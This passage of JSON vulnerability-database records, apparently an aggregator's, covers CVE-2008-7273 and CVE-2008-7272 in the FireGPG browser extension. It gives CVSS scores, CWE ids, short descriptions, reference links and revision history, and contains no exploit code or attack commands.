[{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T05:35:21", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T05:35:21", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "hash": "5b731cb69531a1a4f440c98e6086aef32b59d25a21b3e795f6d21cdd0acb5966", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "85fdbb6779c8f53457b03e4617cac1fd", "key": "extraReferences"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "immutableFields": [], "lastseen": "2021-02-02T05:35:21", "modified": "2019-11-20T15:56:00", "objectVersion": "1.5", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 78}, "different_elements": ["cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T05:35:21"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "2323c5f10ea99bff6a3fd88adbf7723c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "b37293c28011cded7e6cea212cc908fa"}, {"key": "cvelist", "hash": "9c6958cd5dd022a438c0a93346bb7717"}, {"key": "cvss", "hash": "6f6410364e4cee78bd47ed1fc3d8dd5b"}, {"key": "cvss2", "hash": "a6adb76bd2d2e833d4aee455da4b36c3"}, {"key": "cvss3", "hash": "beb519effad5780952ea4ce1697a49ad"}, {"key": "cwe", "hash": "c92f044c94e4360fec268c45081f3bc6"}, {"key": "description", "hash": "f427291f843f1948956af8f0777cb86f"}, {"key": "extraReferences", "hash": "85fdbb6779c8f53457b03e4617cac1fd"}, {"key": "href", "hash": "b066b40875680d07f9f9912048360029"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "368a4092894f1320c5eb8d6f1746c872"}, {"key": "published", "hash": "d1c394bb6e6939e65900ac8652bcb35f"}, {"key": "references", "hash": "d613e2c86955266b0d3e0b9be74eae16"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5a3d95049ed4485340188fd46566963d"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "d695debc34a1657f10acd9dd2989cff4ec01e7bd03c81d546ca7db279f9ade48", "viewCount": 85, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-21T20:41:43", "rev": 2}, "score": {"value": 1.2, "vector": "NONE", "modified": "2021-04-21T20:41:43", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": [], "cwe": ["CWE-59"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "immutableFields": []}, {"id": "CVE-2008-7272", "bulletinFamily": "NVD", "title": "CVE-2008-7272", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "published": "2019-11-08T00:15:00", "modified": "2020-02-10T21:16:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "reporter": "cve@mitre.org", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "cvelist": ["CVE-2008-7272"], "type": "cve", "lastseen": "2021-04-21T20:41:43", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T13:59:22", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T13:59:22", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "f6701a04d3477e440e72324b648d7646a2f9466e07e83e341707bb314aec84a0", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "a0acab3127efc281e78e28b6a414532c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-09-21T13:59:22", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 10}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T13:59:22"}, {"bulletin": {"affectedSoftware": [{"name": "getfiregpg firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-11T14:25:16", "references": [], "rev": 2}, "score": {"modified": "2020-02-11T14:25:16", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "a5439a88032d0d96d6b3b175c5bb2652a08a5ac9dd8565abd675e989e312c52e", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "c78a0c9b48c95bd2d49fb402de9ce674", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "d2db9f7acf8121ca4d72b70e2934db08", "key": "affectedSoftware"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-02-11T14:25:16", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 10}, "differentElements": ["cvss3", "cpe", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-11T14:25:16"}, {"bulletin": {"affectedSoftware": [{"name": "getfiregpg firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user?s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users?s private key.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-11-15T19:55:37", "references": []}, "score": {"modified": "2019-11-15T19:55:37", "value": 2.4, "vector": "NONE"}}, "hash": "05a389bab8cb239109f07a53e4f0a9c76cc24d31548b23dfad15c1385b48f5a5", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "b0552313c96be75e9ec1c10adb56b096", "key": "modified"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "240c2c1dd6f5cc5cbeb07774547c6c2b", "key": "description"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "c78a0c9b48c95bd2d49fb402de9ce674", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "d2db9f7acf8121ca4d72b70e2934db08", "key": "affectedSoftware"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2019-11-15T19:55:37", "modified": "2019-11-14T14:28:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 2}, "differentElements": ["description", "modified"], "edition": 2, "lastseen": "2019-11-15T19:55:37"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T05:35:21", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T05:35:21", "rev": 2, "value": 2.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://security-tracker.debian.org/tracker/CVE-2008-7272", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7272"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "refsource": "MISC", "tags": ["Third Party Advisory", "Issue Tracking"], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386"}], "hash": "feff88852d5f44ef4f736cb629de97022a0e3f23b99e0deec3d9ee5daaa7d8df", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "4847e3110691b6a6a4c7664c0f127f70", "key": "extraReferences"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "675695b80d1f3d2196a77047e1ceba64", "key": "cpeConfiguration"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "a0acab3127efc281e78e28b6a414532c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "immutableFields": [], "lastseen": "2021-02-02T05:35:21", "modified": "2020-02-10T21:16:00", "objectVersion": "1.5", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 19}, "different_elements": ["cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T05:35:21"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "*"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-11-29T22:56:16", "references": [], "rev": 2}, "score": {"modified": "2020-11-29T22:56:16", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "20ae55db346f6babbeac989b07a5b26e855e45e42cfda6773d64bbcb84e4ef79", "hashmap": [{"hash": "d647e62c83e294ffd6f56a7c761beece", "key": "affectedSoftware"}, {"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "675695b80d1f3d2196a77047e1ceba64", "key": "cpeConfiguration"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-11-29T22:56:16", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 15}, "differentElements": ["affectedSoftware"], "edition": 6, "lastseen": "2020-11-29T22:56:16"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": 